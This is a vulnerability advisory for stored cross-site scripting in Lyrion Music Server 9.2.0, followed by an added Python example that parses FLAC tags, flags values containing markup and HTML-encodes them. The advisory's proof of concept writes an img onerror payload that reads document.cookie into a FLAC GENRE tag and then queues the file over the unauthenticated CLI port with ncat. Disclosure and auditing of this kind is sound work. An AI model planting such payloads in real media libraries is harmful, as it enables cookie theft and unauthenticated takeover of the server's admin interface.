ZEROSCIENCE 7.2 HIGH

Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990

7.2 / 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N


Basic Information

ID ZSL-2026-5990
Published Jun 5, 2026 at 00:00

Affected Product

Lyrion Music Server 9.2.0 (metadata) Stored XSS


Vendor: LMS Community
Product web page: https://www.lyrion.org
Affected version: 9.2.0

Summary: Lyrion Music Server (formerly Logitech Media Server, and
often abbreviated as "LMS") is open-source software which can control
and serve (stream) music to a wide range of physical and virtual audio
players called Squeezeboxes. Lyrion Music Server can stream your local
music collection, internet radio stations, and content from many streaming
services (with and without subscriptions).

Desc: Lyrion Music Server stores media file metadata tags (such as GENRE,
ARTIST, and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored cross-site
scripting. An attacker who gets a file with a malicious tag into the victim's
library has their payload saved during the next library scan and executed
automatically whenever a user views that track's information or plays the
file in the web UI. Because LMS is unauthenticated by default, the injected
script runs with full access to the management interface, allowing admin
commands, settings disclosure, and further exploitation.

Tested on: Windows 10 (64-bit) - EN
Lyrion Music Server (9.2.0 - 1779973211)
Perl/5.32.1
SQLite


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2026-5990
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5990
CVE ID: CVE-2026-50232
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50232


27.05.2026

--


$ metaflac --set-tag=GENRE='<img onerror="alert(document.cookie)" src="1"/>' evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=<img onerror="alert(document.cookie)" src="1"/>
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140

$ ncat localhost 9090
playlist add file:///music/evil.flac
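To show where the bug lives and how a defender can audit a library for it, here is an added Python example (not part of the advisory, and not LMS code): a minimal parser for the FLAC VORBIS_COMMENT block shown in the metaflac listing above, a check that flags tag values carrying HTML markup, and the HTML-encoding step the web UI is missing. The FLAC fixture is constructed in memory, and `build_flac`, `parse_flac_tags`, `suspicious_tags` and `render_safe` are hypothetical names chosen for this example.

```python
import html
import struct

VORBIS_COMMENT = 4  # FLAC metadata block type that carries the tags LMS indexes

def build_flac(comments, vendor=b"constructed"):
    """Constructed fixture (not a playable file): zeroed STREAMINFO, a VORBIS_COMMENT
    block holding `comments`, then a PADDING block flagged as last."""
    body = struct.pack("<I", len(vendor)) + vendor + struct.pack("<I", len(comments))
    for key, value in comments:
        entry = f"{key}={value}".encode("utf-8")
        body += struct.pack("<I", len(entry)) + entry
    streaminfo = bytes([0]) + (34).to_bytes(3, "big") + bytes(34)
    vorbis = bytes([VORBIS_COMMENT]) + len(body).to_bytes(3, "big") + body
    padding = bytes([0x80 | 1]) + (8).to_bytes(3, "big") + bytes(8)  # 0x80 = is-last
    return b"fLaC" + streaminfo + vorbis + padding

def parse_flac_tags(data):
    """Walk the block chain (1-byte header: is-last bit + type, 3-byte big-endian
    length) and return the Vorbis comments as (KEY, value) pairs."""
    if data[:4] != b"fLaC":
        raise ValueError("not a FLAC stream")
    pos, tags = 4, []
    while pos + 4 <= len(data):
        header = data[pos]
        length = int.from_bytes(data[pos + 1:pos + 4], "big")
        block = data[pos + 4:pos + 4 + length]
        if (header & 0x7F) == VORBIS_COMMENT:
            off = 4 + struct.unpack_from("<I", block, 0)[0]  # skip the vendor string
            count = struct.unpack_from("<I", block, off)[0]
            off += 4
            for _ in range(count):
                entry_len = struct.unpack_from("<I", block, off)[0]
                entry = block[off + 4:off + 4 + entry_len].decode("utf-8", "replace")
                key, _, value = entry.partition("=")
                tags.append((key.upper(), value))  # Vorbis keys are case-insensitive
                off += 4 + entry_len
        pos += 4 + length
        if header & 0x80:  # is-last flag set: end of the metadata chain
            break
    return tags

def suspicious_tags(tags):
    """Audit check: a value that changes under HTML escaping carries markup
    characters, which is exactly what a raw-rendering web UI would execute."""
    return [(k, v) for k, v in tags if html.escape(v, quote=True) != v]

def render_safe(tags):
    """The rendering-side fix: HTML-encode every tag value before it reaches the page."""
    return {k: html.escape(v, quote=True) for k, v in tags}
```

Running `suspicious_tags(parse_flac_tags(open(path, "rb").read()))` over a library before a scan flags exactly the files whose tags would be executed by the unpatched UI.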
